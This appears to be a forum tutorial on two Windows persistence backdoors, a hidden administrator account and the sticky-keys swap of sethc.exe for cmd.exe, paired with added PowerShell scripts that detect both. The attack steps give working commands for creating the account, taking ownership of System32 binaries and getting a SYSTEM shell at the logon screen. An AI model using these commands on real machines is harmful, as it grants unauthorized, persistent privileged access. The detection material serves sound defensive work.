I'm not going to bother translating this time, many already know this technique, which is basic! Laziness didn't let me translate! hahaha, sorry folks!
We will discuss the 2 most commonly used methods of maintaining access on Windows, usually called backdoors.
1. In the first technique, after gaining access to the system we create a user account with administrator privileges and hide it from the logon screen, so getting back in is easy. Run the following commands in a command prompt, or put them in a batch file:

net user username password /add
net localgroup administrators username /add
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v username /t REG_DWORD /d 0

The UserList value (a REG_DWORD of 0 named after the account) only hides the account from the welcome screen. The account is still listed by net user, lusrmgr.msc and Get-LocalUser, and its creation leaves Security log events 4720 (account created) and 4732 (member added to a local group), so anyone who audits local administrators will see it.
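To show the other side of this technique, here is an added audit script (not part of the original post) that finds accounts hidden through SpecialAccounts\UserList, reports whether each one is a local administrator, and pulls the matching 4720 creation events. It assumes a Windows 10 / Server 2016 or later host with the built-in LocalAccounts module and an elevated PowerShell session; the key path and event ID are the ones named above.

```powershell
# Added example, not from the original post: audit a host for local accounts
# hidden from the logon screen via SpecialAccounts\UserList and report which
# of them hold Administrators membership. Run in an elevated PowerShell.
# Assumes the built-in LocalAccounts module (Windows 10 / Server 2016+).

$userListKey = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList'

function Get-HiddenLogonAccounts {
    # Every REG_DWORD value of 0 under UserList hides that account name from the welcome screen.
    if (-not (Test-Path $userListKey)) { return @() }   # the key does not exist on a clean install
    $props = Get-ItemProperty -Path $userListKey
    $props.PSObject.Properties |
        Where-Object { $_.Name -notlike 'PS*' -and $_.Value -eq 0 } |   # skip PSPath/PSProvider etc.
        ForEach-Object { $_.Name }
}

function Get-LocalAdminNames {
    # Members of the local Administrators group, stripped of the COMPUTERNAME\ prefix.
    Get-LocalGroupMember -Group 'Administrators' |
        ForEach-Object { ($_.Name -split '\\')[-1] }
}

$hidden = Get-HiddenLogonAccounts
$admins = Get-LocalAdminNames

foreach ($name in $hidden) {
    $user = Get-LocalUser -Name $name -ErrorAction SilentlyContinue
    [pscustomobject]@{
        Account      = $name
        HiddenFromUI = $true
        LocalAdmin   = ($admins -contains $name)
        Exists       = [bool]$user
        Enabled      = if ($user) { $user.Enabled } else { $null }
        LastLogon    = if ($user) { $user.LastLogon } else { $null }
    }
}

# Cross-check: the account-creation audit event survives even though the UI hides the user.
# Event ID 4720 = "A user account was created" (Security log; needs account-management auditing on).
# Property 0 is the new account name, property 4 the account that created it.
Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4720 } -MaxEvents 20 -ErrorAction SilentlyContinue |
    Select-Object TimeCreated,
                  @{ n = 'NewAccount'; e = { $_.Properties[0].Value } },
                  @{ n = 'CreatedBy';  e = { $_.Properties[4].Value } }
```

A hidden account that is also in Administrators and has never logged on interactively is exactly the profile this backdoor produces; the 4720 event tells you which session created it.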
2. The second method is more efficient and much less visible. It relies on the following behaviour: before anyone logs in, while the logon screen is displayed, Windows will still launch a small set of accessibility helpers. One of them is "sethc.exe" in the System32 directory, which implements Sticky Keys and is started by pressing the Shift key 5 times.
What we do is replace "sethc.exe" in System32 with a copy of "cmd.exe", so that pressing Shift 5 times at the logon screen opens a command prompt instead of the Sticky Keys dialog. Because winlogon launches it, that prompt runs as SYSTEM, which is even more powerful than an administrator's shell. Simply renaming files in System32 does not work, even as an administrator: the binaries are owned by TrustedInstaller and administrators only have read and execute rights on them. So we first take ownership and grant ourselves full control, then copy cmd.exe somewhere else, rename the copy to "sethc.exe", move the original "sethc.exe" aside and drop the renamed copy into System32.
If you have an administrator account on the machine, run the following in cmd or as a batch file. You can also do it by hand in Explorer, since it is just a take-ownership, rename and copy job.

takeown /f "C:\Windows\System32\sethc.exe"
cacls "C:\Windows\System32\sethc.exe" /e /p %username%:F
copy "C:\Windows\System32\cmd.exe" "C:\Windows\"
rename "C:\Windows\cmd.exe" sethc.exe
rename "C:\Windows\System32\sethc.exe" sethc.exe.old
copy "C:\Windows\sethc.exe" "C:\Windows\System32\"
If you don't have administrator access, boot from a Windows install or recovery DVD, press Shift+F10 to open a command prompt, and type:

copy "C:\Windows\System32\cmd.exe" "C:\Windows\"
rename "C:\Windows\cmd.exe" sethc.exe
rename "C:\Windows\System32\sethc.exe" sethc.exe.old
copy "C:\Windows\sethc.exe" "C:\Windows\System32\"

Check the drive letter first (dir C:\), because the Windows volume is not always mounted as C: from the recovery environment, and on a BitLocker-protected disk this offline route needs the recovery key before the volume can be read at all.
Very similar to the online version; the only difference is that the recovery environment is not bound by the running system's protection of System32, so you don't need to take ownership or edit permissions.
From now on, at any time (even at the welcome screen when nobody is logged in), pressing Shift 5 times quickly spawns cmd running as SYSTEM. Keep in mind that this is easy to spot: sethc.exe now carries cmd.exe's hash and version information, sfc /scannow will put the original back, and the sethc.exe.old left behind by the procedure above is a giveaway.
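As an added detection example (not part of the original post, and not the author's code), the script below checks the swapped-binary backdoor from the other direction: it compares sethc.exe's hash against cmd.exe, reads the version resource (a copied cmd.exe still reports Cmd.Exe as its original filename), verifies the Microsoft signature, and looks for the leftover sethc.exe.old. It goes beyond the post in two places that are my assumptions, not the author's: it also checks the other accessibility binaries the logon screen can launch (utilman.exe, osk.exe, narrator.exe, magnify.exe, displayswitch.exe, atbroker.exe), and it checks for the Image File Execution Options "Debugger" variant of the same trick, which redirects the binary through the registry without touching the file. Run it in an elevated PowerShell.

```powershell
# Added example, not from the original post: detect the sticky-keys backdoor
# and its variants. Checks per binary: (1) identical hash to cmd.exe,
# (2) version resource OriginalFilename that does not match the file name,
# (3) Authenticode signature no longer valid, (4) an IFEO "Debugger" value
# redirecting the binary (assumed variant; the post only covers file swapping),
# (5) a sethc.exe.old style backup left behind by the procedure above.
# Checking binaries beyond sethc.exe is an assumption of this example.

$system32 = Join-Path $env:SystemRoot 'System32'
$accessibilityBinaries = 'sethc.exe', 'utilman.exe', 'osk.exe', 'narrator.exe',
                         'magnify.exe', 'displayswitch.exe', 'atbroker.exe'
$ifeoRoot = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options'
$cmdHash  = (Get-FileHash -Algorithm SHA256 -Path (Join-Path $system32 'cmd.exe')).Hash

function Test-AccessibilityBinary {
    param([string]$Name)
    $path = Join-Path $system32 $Name
    if (-not (Test-Path $path)) { return $null }          # not every build ships every helper

    $hash        = (Get-FileHash -Algorithm SHA256 -Path $path).Hash
    $versionInfo = (Get-Item $path).VersionInfo
    $sig         = Get-AuthenticodeSignature -FilePath $path   # catalog-signed files validate too
    $ifeo        = Get-ItemProperty -Path (Join-Path $ifeoRoot $Name) -Name Debugger -ErrorAction SilentlyContinue

    [pscustomobject]@{
        Binary           = $Name
        SameHashAsCmd    = ($hash -eq $cmdHash)
        OriginalFilename = $versionInfo.OriginalFilename
        NameMismatch     = [bool]($versionInfo.OriginalFilename -and
                                  $versionInfo.OriginalFilename -ine $Name)
        SignatureStatus  = $sig.Status                       # expect 'Valid' on an untouched binary
        Signer           = $sig.SignerCertificate.Subject
        IfeoDebugger     = $ifeo.Debugger                    # null unless the IFEO variant is present
        BackupLeftBehind = (Test-Path "$path.old")           # sethc.exe.old from the steps above
    }
}

$results = $accessibilityBinaries | ForEach-Object { Test-AccessibilityBinary $_ } | Where-Object { $_ }
$results | Format-Table Binary, SameHashAsCmd, NameMismatch, SignatureStatus, IfeoDebugger, BackupLeftBehind -AutoSize

$suspicious = $results | Where-Object {
    $_.SameHashAsCmd -or $_.NameMismatch -or $_.SignatureStatus -ne 'Valid' -or
    $_.IfeoDebugger -or $_.BackupLeftBehind
}
if ($suspicious) {
    Write-Warning "Possible accessibility-binary backdoor on $($env:COMPUTERNAME):"
    $suspicious | Format-List
    # Remediation: restore the originals from the component store, then drop any IFEO redirect:
    #   sfc /scannow
    #   Remove-ItemProperty -Path "$ifeoRoot\sethc.exe" -Name Debugger
}
```

Any single hit is worth a look, but the combination the post's own procedure produces is unmistakable: SameHashAsCmd true, OriginalFilename reading Cmd.Exe, and a sethc.exe.old sitting next to it.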